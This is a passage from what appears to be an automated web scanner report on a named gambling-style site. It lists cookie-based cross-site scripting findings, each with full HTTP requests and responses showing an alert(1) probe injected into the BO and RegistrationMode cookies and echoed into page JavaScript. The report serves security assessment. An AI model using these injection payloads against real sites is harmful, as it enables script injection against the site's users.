Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM9ff03"-alert(1)-"7fbdf972a1f; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: BO=FM9ff03"-alert(1)-"7fbdf972a1f; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44057


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9ff03"-alert(1)-"7fbdf972a1f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.298. http://www.mundirasca.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3545f"-alert(1)-"e9086e55cfd was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM3545f"-alert(1)-"e9086e55cfd; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM3545f"-alert(1)-"e9086e55cfd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:19 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44057


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM3545f"-alert(1)-"e9086e55cfd";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.299. http://www.mundirasca.com/ContactUsTel.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsTel.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec6c7"-alert(1)-"b781054fc69 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMec6c7"-alert(1)-"b781054fc69; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: BO=FMec6c7"-alert(1)-"b781054fc69; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:30 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36127


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMec6c7"-alert(1)-"b781054fc69";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.300. http://www.mundirasca.com/ContactUsTel.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /ContactUsTel.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1238"-alert(1)-"49f227d376 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMc1238"-alert(1)-"49f227d376; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc1238"-alert(1)-"49f227d376; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc1238"-alert(1)-"49f227d376";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.301. http://www.mundirasca.com/FAQ.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FAQ.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d21b0"-alert(1)-"73f2d8373bf was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMd21b0"-alert(1)-"73f2d8373bf; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: BO=FMd21b0"-alert(1)-"73f2d8373bf; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd21b0"-alert(1)-"73f2d8373bf";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.302. http://www.mundirasca.com/FAQ.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FAQ.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40ba4"-alert(1)-"74dcacff84f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM40ba4"-alert(1)-"74dcacff84f; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM40ba4"-alert(1)-"74dcacff84f; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:15 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM40ba4"-alert(1)-"74dcacff84f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.303. http://www.mundirasca.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114da"-alert(1)-"07a902d5b1e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM114da"-alert(1)-"07a902d5b1e; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: BO=FM114da"-alert(1)-"07a902d5b1e; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:42 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM114da"-alert(1)-"07a902d5b1e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.304. http://www.mundirasca.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bb77"-alert(1)-"ff4a7dede90 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM2bb77"-alert(1)-"ff4a7dede90; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2bb77"-alert(1)-"ff4a7dede90; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:31 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2bb77"-alert(1)-"ff4a7dede90";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.305. http://www.mundirasca.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85403"-alert(1)-"5b3fdfbd71 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM85403"-alert(1)-"5b3fdfbd71; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: BO=FM85403"-alert(1)-"5b3fdfbd71; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:02 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36959


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM85403"-alert(1)-"5b3fdfbd71";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.306. http://www.mundirasca.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mundirasca.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d14ae"-alert(1)-"37554d0d6f9 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMd14ae"-alert(1)-"37554d0d6f9; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMd14ae"-alert(1)-"37554d0d6f9; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36960


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

